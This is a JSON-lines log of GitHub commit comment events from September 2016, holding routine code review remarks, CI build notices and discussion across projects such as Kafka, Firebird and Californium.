{"id":"4534115289","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945107,"position":null,"line":null,"path":null,"commit_id":"fc7c2f40d279c6ac77f88e664479085850aa68b2","created_at":"2016-09-08T13:48:39Z","updated_at":"2016-09-08T13:48:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 967](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12941&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:10:48"}},"created_at":"2016-09-08T13:48:39Z"}
{"id":"4534116411","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"tokuhirom/Module-Build-Pluggable-XSUtil"},"payload":{"comment":{"id":18945110,"position":null,"line":null,"path":null,"commit_id":"f173210835b0a38652f488f7ae10862b0edc7d4b","created_at":"2016-09-08T13:48:50Z","updated_at":"2016-09-08T13:48:50Z","body":"Is this going to be released as a v1.03 ??   v1.02 (the code as released), is a show stopper for anyone running cygwin.   They 'can' force install, then hand patch, but only if they happen to find this thread."}},"created_at":"2016-09-08T13:48:50Z"}
{"id":"4534116571","type":"CommitCommentEvent","actor":{"login":"Ma27"},"repo":{"name":"willdurand/puppet-nodejs"},"payload":{"comment":{"id":18945111,"position":9,"line":9,"path":"manifests/instance/pkgs.pp","commit_id":"212e2141b9ae40131216ed494c5803b4675bebdf","created_at":"2016-09-08T13:48:52Z","updated_at":"2016-09-08T13:48:52Z","body":"should be private"}},"created_at":"2016-09-08T13:48:52Z"}
{"id":"4534117615","type":"CommitCommentEvent","actor":{"login":"jamiedbennett"},"repo":{"name":"snapcore/snapweb"},"payload":{"comment":{"id":18945113,"position":null,"line":null,"path":null,"commit_id":"3cfcc81a0bac3d32a8b98a1dbc68a02619aaffcc","created_at":"2016-09-08T13:49:02Z","updated_at":"2016-09-08T13:49:02Z","body":"lgtm"}},"created_at":"2016-09-08T13:49:02Z"}
{"id":"4534117670","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18945114,"position":null,"line":null,"path":null,"commit_id":"2636a7d8176ff0585de5e9db7df55b7fcd1fea5f","created_at":"2016-09-08T13:49:02Z","updated_at":"2016-09-08T13:49:02Z","body":"@pb00068 \r\nOh, I didn't see that..."}},"created_at":"2016-09-08T13:49:02Z"}
{"id":"4534123049","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945123,"position":6,"line":6,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:49:57Z","updated_at":"2016-09-08T13:49:57Z","body":"По-моему, нам для этого аксессор не нужен, мы же только внутри класса юзаем это."}},"created_at":"2016-09-08T13:49:57Z"}
{"id":"4534127077","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":18945137,"position":null,"line":null,"path":null,"commit_id":"48677345281a93d8829dd37d0480a6062945416a","created_at":"2016-09-08T13:50:41Z","updated_at":"2016-09-08T13:50:41Z","body":"See https://travis-ci.org/behdad/harfbuzz/jobs/158296023."}},"created_at":"2016-09-08T13:50:41Z"}
{"id":"4534131614","type":"CommitCommentEvent","actor":{"login":"mattsmith14"},"repo":{"name":"ainc/awesomeinc2013"},"payload":{"comment":{"id":18945147,"position":113,"line":2739,"path":"assets/css/main.css","commit_id":"f7fea5435bfd1c8c1bcb9c01630b241f2910f9c1","created_at":"2016-09-08T13:51:27Z","updated_at":"2016-09-08T13:51:27Z","body":"See #10 "}},"created_at":"2016-09-08T13:51:27Z"}
{"id":"4534132222","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18945148,"position":null,"line":null,"path":null,"commit_id":"173be4886977f85bf749c6afade2e3a5a08c69d3","created_at":"2016-09-08T13:51:33Z","updated_at":"2016-09-08T13:51:33Z","body":"Yeah - but don't follow it slavisly. Remember how long it took for us to understand how it worked. If we can make it easier to understand, we should."}},"created_at":"2016-09-08T13:51:33Z"}
{"id":"4534133252","type":"CommitCommentEvent","actor":{"login":"ijuma"},"repo":{"name":"apache/kafka"},"payload":{"comment":{"id":18945154,"position":17,"line":36,"path":"streams/src/main/java/org/apache/kafka/streams/processor/TimestampExtractor.java","commit_id":"69ebf6f7be2fc0e471ebd5b7a166468017ff2651","created_at":"2016-09-08T13:51:43Z","updated_at":"2016-09-08T13:51:43Z","body":"Btw, one can prevent this by setting `message.timestamp.difference.max.ms`/`log.message.timestamp.difference.max.ms`."}},"created_at":"2016-09-08T13:51:43Z"}
{"id":"4534135970","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945163,"position":6,"line":6,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:52:12Z","updated_at":"2016-09-08T13:52:12Z","body":"Да, верно, выпилю."}},"created_at":"2016-09-08T13:52:12Z"}
{"id":"4534136196","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"SungyunSEO/sum_test"},"payload":{"comment":{"id":18945165,"position":null,"line":null,"path":null,"commit_id":"2b94b63331bbf038180e0153d4d626fd2c3ccbb7","created_at":"2016-09-08T13:52:14Z","updated_at":"2016-09-08T13:52:14Z","body":"You don't need to upload temporary files such as *.o, *.obj, and excutable file. "}},"created_at":"2016-09-08T13:52:14Z"}
{"id":"4534137930","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945171,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:52:30Z","updated_at":"2016-09-08T13:52:30Z","body":"Вот это мне не понятно. Мы вызываем метод `add_train` у класса `Station`? Что возвращает `self.Train`? Если мы двигаемся на следующую станцию, нужно ли передавать её название в аргументе?"}},"created_at":"2016-09-08T13:52:30Z"}
{"id":"4534140797","type":"CommitCommentEvent","actor":{"login":"ivanbuhov"},"repo":{"name":"NativeScript/ios-runtime"},"payload":{"comment":{"id":18945178,"position":42,"line":39,"path":"src/NativeScript/Workers/WorkerThread.mm","commit_id":"10fca84d7db298422faf75c466d88ba2f551074c","created_at":"2016-09-08T13:52:59Z","updated_at":"2016-09-08T13:52:59Z","body":"Since we [schedule the runtime on the current run loop](https://github.com/NativeScript/ios-runtime/commit/10fca84d7db298422faf75c466d88ba2f551074c#diff-eac9671d2653af2182014de6e04201d3R57), why not removing it on runtime termination?"}},"created_at":"2016-09-08T13:52:59Z"}
{"id":"4534142122","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945180,"position":57,"line":57,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:53:13Z","updated_at":"2016-09-08T13:53:13Z","body":"Нужно `<=` иначе получится сделать `-1` вагон."}},"created_at":"2016-09-08T13:53:13Z"}
{"id":"4534142253","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18945182,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T13:53:15Z","updated_at":"2016-09-08T13:53:15Z","body":"Thanks!\r\nWhat's your opinion about using Dependency injection in Vert.x projects? Isn't that a bit risky, easy to get burned by locks in shared objects?"}},"created_at":"2016-09-08T13:53:15Z"}
{"id":"4534148181","type":"CommitCommentEvent","actor":{"login":"ssh88"},"repo":{"name":"justeat/KLCPopup"},"payload":{"comment":{"id":18945189,"position":12,"line":552,"path":"KLCPopup/KLCPopup.m","commit_id":"aeee6fe94ff0c67288dac975c52b2f56ae078b0d","created_at":"2016-09-08T13:54:18Z","updated_at":"2016-09-08T13:54:18Z","body":"being picky, but could change this to firstObject instead of index 0"}},"created_at":"2016-09-08T13:54:18Z"}
{"id":"4534148314","type":"CommitCommentEvent","actor":{"login":"Kyslik"},"repo":{"name":"Kyslik/column-sortable"},"payload":{"comment":{"id":18945191,"position":2,"line":33,"path":"src/ColumnSortable/ColumnSortableServiceProvider.php","commit_id":"f446f28146a060af384ad375e549bfaf1e21ded3","created_at":"2016-09-08T13:54:20Z","updated_at":"2016-09-08T13:54:20Z","body":"Forgot to remove this :("}},"created_at":"2016-09-08T13:54:20Z"}
{"id":"4534148476","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945192,"position":81,"line":81,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:54:20Z","updated_at":"2016-09-08T13:54:20Z","body":"Нам нужно не только показывать список всех поездов, но ещё уметь показывать поезда по типу."}},"created_at":"2016-09-08T13:54:20Z"}
{"id":"4534151599","type":"CommitCommentEvent","actor":{"login":"soukakei"},"repo":{"name":"soukakei/work001"},"payload":{"comment":{"id":18945198,"position":null,"line":null,"path":null,"commit_id":"b2cf45920f8530874b6c3021a5e66b63a9c40358","created_at":"2016-09-08T13:54:46Z","updated_at":"2016-09-08T13:54:46Z","body":"image"}},"created_at":"2016-09-08T13:54:46Z"}
{"id":"4534155685","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18945211,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-08T13:55:25Z","updated_at":"2016-09-08T13:55:25Z","body":"I think there is the same issue on MessageID but not exactly the same consequence.\r\n\r\nThe correlation MUST be MessageID + endpoint source.\r\nIf we chose endpoint source is address+port, we can face some strange behavior over DTLS+NAT.\r\n\r\nImagine 2 clients A and B using DTLS behind a NAT.\r\nClient A send a request with message id  X. he gets its response RA.\r\nFew seconds later, a client B send a request with the same message id X and get the same IP/Port. (I know this should pretty infrequent)\r\nThe CoAP server will send the response RA to B thinking this is a duplicate.\r\n\r\nI reread [the spec](https://tools.ietf.org/html/rfc7252#section-9.1.1) and it say that :\r\n\"A message is the same when it is sent within the same DTLS session and same epoch and has the same Message ID.\"\r\n\r\nI suppose the spec ambiguity mainly concerns token.  MessageID should not live as long as token so this restriction probably makes sense."}},"created_at":"2016-09-08T13:55:25Z"}
{"id":"4534156669","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18945215,"position":27,"line":205,"path":"scripts/interactive-video.js","commit_id":"014a46173eaa49bd0d9e53891060eb21ad7cb3ad","created_at":"2016-09-08T13:55:33Z","updated_at":"2016-09-08T13:55:33Z","body":"self.controls is undefined in FireFox"}},"created_at":"2016-09-08T13:55:33Z"}
{"id":"4534157514","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":18945217,"position":null,"line":null,"path":null,"commit_id":"7ad77582b41e34d7f83331cf883e448c93142e63","created_at":"2016-09-08T13:55:41Z","updated_at":"2016-09-08T13:55:41Z","body":"Code has not been spartanized yet. Please do."}},"created_at":"2016-09-08T13:55:41Z"}
{"id":"4534161665","type":"CommitCommentEvent","actor":{"login":"desaishivam26"},"repo":{"name":"Tesla-M-Devices/android_device_motorola_lux"},"payload":{"comment":{"id":18945225,"position":null,"line":null,"path":null,"commit_id":"a48f0f9b5b5498e2a207f4b46e11b01db8952882","created_at":"2016-09-08T13:56:22Z","updated_at":"2016-09-08T13:56:22Z","body":"Ok now get to work"}},"created_at":"2016-09-08T13:56:22Z"}
{"id":"4534166278","type":"CommitCommentEvent","actor":{"login":"ThugCodeCat"},"repo":{"name":"ThugCodeCat/hopeForForms"},"payload":{"comment":{"id":18945231,"position":null,"line":null,"path":null,"commit_id":"366b5e9a4db50a2c38586bfc2d2e5c72da45d345","created_at":"2016-09-08T13:57:04Z","updated_at":"2016-09-08T13:57:04Z","body":"Add min and max number to messages."}},"created_at":"2016-09-08T13:57:04Z"}
{"id":"4534166807","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18945233,"position":null,"line":null,"path":null,"commit_id":"c16aa52d32da16b5b1f9db08e7728fdc467f44a8","created_at":"2016-09-08T13:57:11Z","updated_at":"2016-09-08T13:57:11Z","body":"++"}},"created_at":"2016-09-08T13:57:11Z"}
{"id":"4534167410","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18945235,"position":null,"line":null,"path":null,"commit_id":"f7a44710fe9f18135f6bd3f15e7bdaed954c86ed","created_at":"2016-09-08T13:57:17Z","updated_at":"2016-09-08T13:57:17Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=29)"}},"created_at":"2016-09-08T13:57:17Z"}
{"id":"4534169122","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18945238,"position":null,"line":null,"path":null,"commit_id":"a78dcd2348eb4f8ae8165da14daea7f3a2ae6e0a","created_at":"2016-09-08T13:57:32Z","updated_at":"2016-09-08T13:57:32Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=30)"}},"created_at":"2016-09-08T13:57:32Z"}
{"id":"4534169331","type":"CommitCommentEvent","actor":{"login":"raphink"},"repo":{"name":"speedata/hyphenation"},"payload":{"comment":{"id":18945240,"position":1,"line":1,"path":"Readme.md","commit_id":"da9f06d81fcd3b06b44ac4decdfcf8ace3135bf1","created_at":"2016-09-08T13:57:34Z","updated_at":"2016-09-08T13:57:34Z","body":"The input language is what I'd love to see disappear in TeX. After 10 years of using it, I still get headaches from trying to write simple logic in TeX packages. I'd love a new language with real modern expressivity."}},"created_at":"2016-09-08T13:57:34Z"}
{"id":"4534171033","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945244,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:57:50Z","updated_at":"2016-09-08T13:57:50Z","body":"> Мы вызываем метод add_train у класса Station?\r\nПоправил.\r\n\r\n> Что возвращает self.Train?\r\nЗадумка — добавлять объект, к которому применяется метод `move_to_next_station`, на станцию, которая указывается в качестве аргумента.\r\n\r\n> Если мы двигаемся на следующую станцию, нужно ли передавать её название в аргументе?\r\nВ конексте задачи — не обязательно, но если мы, например, захотим двигаться на на следующую станцию, а через одну? Я уберу в названии метода `next`."}},"created_at":"2016-09-08T13:57:50Z"}
{"id":"4534171100","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18945245,"position":null,"line":null,"path":null,"commit_id":"2cc5529379749e48e140b1a6ed05c57fc7a8ce51","created_at":"2016-09-08T13:57:51Z","updated_at":"2016-09-08T13:57:51Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=31)"}},"created_at":"2016-09-08T13:57:51Z"}
{"id":"4534172009","type":"CommitCommentEvent","actor":{"login":"cynthiayoung"},"repo":{"name":"lljbash/NoNews"},"payload":{"comment":{"id":18945248,"position":null,"line":null,"path":null,"commit_id":"d96835d0534d62ea19eab8f4d1d251e8024aecbb","created_at":"2016-09-08T13:57:59Z","updated_at":"2016-09-08T13:57:59Z","body":"咸鱼你好"}},"created_at":"2016-09-08T13:57:59Z"}
{"id":"4534173497","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18945253,"position":null,"line":null,"path":null,"commit_id":"bf0c3dfdbf980703a56a360bc3b72436965874c1","created_at":"2016-09-08T13:58:16Z","updated_at":"2016-09-08T13:58:16Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=32)"}},"created_at":"2016-09-08T13:58:16Z"}
{"id":"4534176668","type":"CommitCommentEvent","actor":{"login":"HurinAlexey"},"repo":{"name":"HurinAlexey/Lesson2task1"},"payload":{"comment":{"id":18945260,"position":null,"line":null,"path":null,"commit_id":"9cdf44b5e5b575f26a505391b19947aa0b8206ef","created_at":"2016-09-08T13:58:45Z","updated_at":"2016-09-08T13:58:45Z","body":"Есть список поездов, представленный с виде XML. Вывести на экран информацию о тех поездах, которые \r\nотправляются сегодня с 15:00 до 19:00.\r\nНаписать код для добавления новых поездов в существующий  XML."}},"created_at":"2016-09-08T13:58:45Z"}
{"id":"4534179088","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18945267,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T13:59:08Z","updated_at":"2016-09-08T13:59:08Z","body":"Is that *really* a problem? I mean, many other devices don't set iManufacturer and iProduct. See HTC 10 (https://github.com/CyanogenMod/android_device_htc_pme/blob/cm-13.0/rootdir/etc/init.qcom.usb.rc) and OnePlus3 (https://github.com/CyanogenMod/android_device_oneplus_oneplus3/blob/cm-13.0/rootdir/etc/init.qcom.usb.rc)."}},"created_at":"2016-09-08T13:59:08Z"}
{"id":"4534180683","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18945274,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T13:59:23Z","updated_at":"2016-09-08T13:59:23Z","body":"@h2o64 , what do you think?"}},"created_at":"2016-09-08T13:59:23Z"}
{"id":"4534183944","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945284,"position":57,"line":57,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T13:59:54Z","updated_at":"2016-09-08T13:59:54Z","body":"Почему? У нас же значение не может быть < 0, а -1 это < 0. :)"}},"created_at":"2016-09-08T13:59:54Z"}
{"id":"4534185644","type":"CommitCommentEvent","actor":{"login":"yonatanm"},"repo":{"name":"outbrain/outbrain.github.io"},"payload":{"comment":{"id":18945291,"position":5,"line":10,"path":"js/app.js","commit_id":"5923d5634ba0153e694d2ec4dffcf72e30f47e9b","created_at":"2016-09-08T14:00:14Z","updated_at":"2016-09-08T14:00:14Z","body":"does it have to be instead of propegator ? it has 61 stars .. maybe we can have 3 lines ? or 2 lines with bigger images, and some lines with smaller one so we can show more ?"}},"created_at":"2016-09-08T14:00:14Z"}
{"id":"4534187498","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945295,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:00:30Z","updated_at":"2016-09-08T14:00:30Z","body":"Probably stupid quiestion, but - why do we need a rule for non_reserved_word ?"}},"created_at":"2016-09-08T14:00:30Z"}
{"id":"4534192866","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945311,"position":81,"line":81,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T14:01:19Z","updated_at":"2016-09-08T14:01:19Z","body":"Поправил."}},"created_at":"2016-09-08T14:01:19Z"}
{"id":"4534197365","type":"CommitCommentEvent","actor":{"login":"dgasmith"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18945319,"position":31,"line":308,"path":"psi4/share/psi4/python/molutil.py","commit_id":"04f9b104db7f7e8ad30eea0aa355e6bfbd3c644f","created_at":"2016-09-08T14:01:59Z","updated_at":"2016-09-08T14:01:59Z","body":"No, this is mostly a note to myself to look back into it. The above should work fine with the deletion of line 304. Fixed in f2e5ade69ee00ea0b054b5e6c01d7fa20af90e74."}},"created_at":"2016-09-08T14:01:59Z"}
{"id":"4534199608","type":"CommitCommentEvent","actor":{"login":"martijn-van-der-kooij"},"repo":{"name":"swiftyguys/lib-swifty-plugin"},"payload":{"comment":{"id":18945325,"position":null,"line":null,"path":null,"commit_id":"23b2ea4c55c0a62f204c1541a98dd7b28110d730","created_at":"2016-09-08T14:02:21Z","updated_at":"2016-09-08T14:02:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WJqxMBpC&#x2F;2168-make-sure-license-check-is-performed-after-9-days-make-it-less-depending-on-the-plugin-update-check\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Make sure license check is performed after 9 days, make it less depending on the plugin update check</a>"}},"created_at":"2016-09-08T14:02:21Z"}
{"id":"4534199790","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18945326,"position":null,"line":null,"path":null,"commit_id":"7ffbe5174f0b349396571031a7a3d8ddfb08cd41","created_at":"2016-09-08T14:02:22Z","updated_at":"2016-09-08T14:02:22Z","body":"Doh, I didn't notice libreoffice was a reverse dependency of sablotron. I might have kept the md5 hash if I knew :-)"}},"created_at":"2016-09-08T14:02:22Z"}
{"id":"4534204878","type":"CommitCommentEvent","actor":{"login":"splix"},"repo":{"name":"ethereumproject/README"},"payload":{"comment":{"id":18945333,"position":null,"line":null,"path":null,"commit_id":"1867f48ce771c5ee63bac91a850b3a0f25f932ff","created_at":"2016-09-08T14:03:05Z","updated_at":"2016-09-08T14:03:05Z","body":"What do you mean by uploading LICENSE file here?"}},"created_at":"2016-09-08T14:03:05Z"}
{"id":"4534207630","type":"CommitCommentEvent","actor":{"login":"PJB3005"},"repo":{"name":"d3athrow/vgstation13"},"payload":{"comment":{"id":18945339,"position":null,"line":null,"path":null,"commit_id":"0f9616e623dcab5af936d4b15bc7f108fc8c9749","created_at":"2016-09-08T14:03:28Z","updated_at":"2016-09-08T14:03:28Z","body":"> Implement wafflepipes **and** remove hyperthermia in the same changelog commit.\r\n\r\nRIP Celt."}},"created_at":"2016-09-08T14:03:28Z"}
{"id":"4534212096","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":18945347,"position":5,"line":28,"path":"Makefile","commit_id":"60ffb457ee2bc1b3c9a4b90a9f8c59847dc75850","created_at":"2016-09-08T14:04:12Z","updated_at":"2016-09-08T14:04:12Z","body":"噢，谢谢两位解答~"}},"created_at":"2016-09-08T14:04:12Z"}
{"id":"4534212376","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945351,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:04:15Z","updated_at":"2016-09-08T14:04:15Z","body":"With EXCEPTION being non-reserved in both 2.5 and 3.0 making it reserved again may cause name conflicts when people migrate to 4.0. Taking into an account that we anyway need something for ERROR_MESSAGE that looks bad solution.\r\n\r\nMay be some built-in function (no idea about name right now) having single argument (SQLCODE, GDSCODE, ERROR_MESSAGE, etc.) which returns appropriate object?"}},"created_at":"2016-09-08T14:04:15Z"}
{"id":"4534215041","type":"CommitCommentEvent","actor":{"login":"trowski"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18945360,"position":12,"line":280,"path":"lib/Websocket/Rfc6455Endpoint.php","commit_id":"0cd26e59b4bcc691acac5fc91faf4e65e6ed8db5","created_at":"2016-09-08T14:04:39Z","updated_at":"2016-09-08T14:04:39Z","body":"I was meaning to ask you more about how this should be handled. I can refactor this a bit then."}},"created_at":"2016-09-08T14:04:39Z"}
{"id":"4534225312","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945374,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:06:19Z","updated_at":"2016-09-08T14:06:19Z","body":"To Vlad:\r\n> why do we need a rule for non_reserved_word ?\r\nIt makes it possible to use non-reserved keywords as generic identifiers (table name, field name, variable name. etc.)"}},"created_at":"2016-09-08T14:06:19Z"}
{"id":"4534226748","type":"CommitCommentEvent","actor":{"login":"nvdb97"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18945378,"position":null,"line":null,"path":null,"commit_id":"fe88638c23486fe1fa2b49a456498c63c53a3e68","created_at":"2016-09-08T14:06:31Z","updated_at":"2016-09-08T14:06:31Z","body":"Hello,\r\nmaybe i have a idea what you could include,\r\nI think maybe a view on your pokedex from the catchem window would be nice.\r\nSo that we could see our progress, atleast a number like catched: 122/151 or so\r\nthanks for everything else this program is working fine :D"}},"created_at":"2016-09-08T14:06:31Z"}
{"id":"4534232878","type":"CommitCommentEvent","actor":{"login":"droserasprout"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18945397,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T14:07:29Z","updated_at":"2016-09-08T14:07:29Z","body":"There's no problem until you connect many Android devices without iProduct and need to tell em one from another I guess. The question is why should we touch something that works and could be potentially useful?"}},"created_at":"2016-09-08T14:07:29Z"}
{"id":"4534233744","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18945398,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-08T14:07:37Z","updated_at":"2016-09-08T14:07:37Z","body":"The spec actually contains some more text before the paragraph you have quoted:\r\n> The following rules are added for matching an Acknowledgement message\r\n   or Reset message to a Confirmable message, or a Reset message to a\r\n   Non-confirmable message: The DTLS session MUST be the same, and the\r\n   epoch MUST be the same.\r\n   A message is the same when it is sent within the same DTLS session\r\n   and same epoch and has the same Message ID.\r\n\r\nAFAIK the main problem is the usage of *The following rules are added* introduces the ambiguity. It is not totally clear whether the rules described afterwards must be considered *in addition* to the rules established for NoSec connections (i.e. IP:port must match) or whether they actually *replace* those rules.\r\nPersonally, I think that they need to be considered *in addition* ..."}},"created_at":"2016-09-08T14:07:37Z"}
{"id":"4534235686","type":"CommitCommentEvent","actor":{"login":"trowski"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18945401,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T14:07:56Z","updated_at":"2016-09-08T14:07:56Z","body":"`$this->doClose()` was throwing (as you probably have figured out now), shown by [this failing test](https://travis-ci.org/amphp/aerys/jobs/158296675#L369).\r\n\r\nIt seems odd to have a coroutine (or awaitable in general) where nothing is ever done with it, so I think rethrowing should be a general practice in such cases so we don't miss bugs.\r\n\r\nI was considering making the definition of `rethrow()` conditional so it does nothing in production… but I'm not sure if that's the correct action, or if we should encourage loop error handlers that just log uncaught exceptions in production."}},"created_at":"2016-09-08T14:07:56Z"}
{"id":"4534236755","type":"CommitCommentEvent","actor":{"login":"demonBee"},"repo":{"name":"demonBee/bigYellowBee"},"payload":{"comment":{"id":18945406,"position":null,"line":null,"path":null,"commit_id":"35cb7057debaede205167e70bfd7aa642e5e12da","created_at":"2016-09-08T14:08:07Z","updated_at":"2016-09-08T14:08:07Z","body":"change aaa"}},"created_at":"2016-09-08T14:08:07Z"}
{"id":"4534236843","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":18945407,"position":null,"line":null,"path":null,"commit_id":"1267d133fe0b926fdd8b25e38d2e5bd3a5e47953","created_at":"2016-09-08T14:08:08Z","updated_at":"2016-09-08T14:08:08Z","body":"@aleray Now you can use `object-position`"}},"created_at":"2016-09-08T14:08:08Z"}
{"id":"4534237900","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945414,"position":null,"line":null,"path":null,"commit_id":"83e6781ed825725db2ca072555e73e93a5771f7c","created_at":"2016-09-08T14:08:17Z","updated_at":"2016-09-08T14:08:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 968](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12954&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T14:08:17Z"}
